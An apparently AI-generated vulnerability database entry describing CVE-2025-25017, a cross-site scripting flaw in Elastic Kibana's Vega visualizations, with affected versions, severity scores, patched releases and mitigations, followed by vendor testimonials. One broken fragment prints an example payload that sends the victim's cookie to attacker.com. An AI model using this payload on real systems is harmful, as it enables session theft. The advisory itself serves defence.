
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-25017 is a Cross-Site Scripting (XSS) vulnerability in Elastic Kibana caused by improper neutralization of input during web page generation (CWE-79). It affects Kibana versions 7.0.0 through 8.18.7, 8.19.0 through 8.19.3, 9.0.0 through 9.0.6, and 9.1.0 through 9.1.3. The vulnerability was published on October 10, 2025, and patches were released in the same timeframe. The CVSS v3.1 base score is 6.1 (Medium) per NVD, though ENISA's EUVD rates it 8.2 (High) with a broader integrity impact assessment (Elastic Advisory, ENISA EUVD).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). Attackers can inject malicious scripts into Kibana web pages that are then rendered in victims' browsers, exploiting insufficient input sanitization or output encoding within the application. The attack vector is network-based, requires no privileges, but does require user interaction (e.g., a victim visiting a crafted or compromised Kibana page). The vulnerability has been associated with Kibana's Vega visualization component based on community analysis (ZeroPath Blog, Elastic Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session within Kibana. This can lead to theft of session tokens, credential harvesting, unauthorized actions performed on behalf of the authenticated user, and potential bypass of access controls. While availability is not directly impacted, confidentiality and integrity are both at risk, particularly for users with elevated Kibana privileges such as administrators (Elastic Advisory, ENISA EUVD).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Feedly, ENISA EUVD).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) embedded within a Vega visualization configuration or another injectable field.Elastic has released patched versions addressing CVE-2025-25017: 8.18.8, 8.19.4, 9.0.7, and 9.1.4. Organizations should upgrade to one of these versions as the primary remediation. As interim mitigations, administrators should implement a strict Content Security Policy (CSP), restrict access to Kibana to trusted networks or authenticated users only, and limit sharing of dashboards and visualizations to trusted internal users. Monitoring for suspicious script execution and unusual outbound connections from browser sessions is also recommended (Elastic Advisory).
The vulnerability received coverage from security news outlets and threat intelligence platforms shortly after disclosure. SecurityOnline.info reported on Elastic's fixes for multiple high-severity Kibana and Elasticsearch vulnerabilities. The NetEye blog published a security advisory for Elastic Stack users. Black Kite included CVE-2025-25017 in its TPRM (Third-Party Risk Management) weekly digest, highlighting it as a notable vendor risk. Community discussion on LinkedIn also noted the XSS risks in Kibana (SecurityOnline, NetEye Blog, Black Kite).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."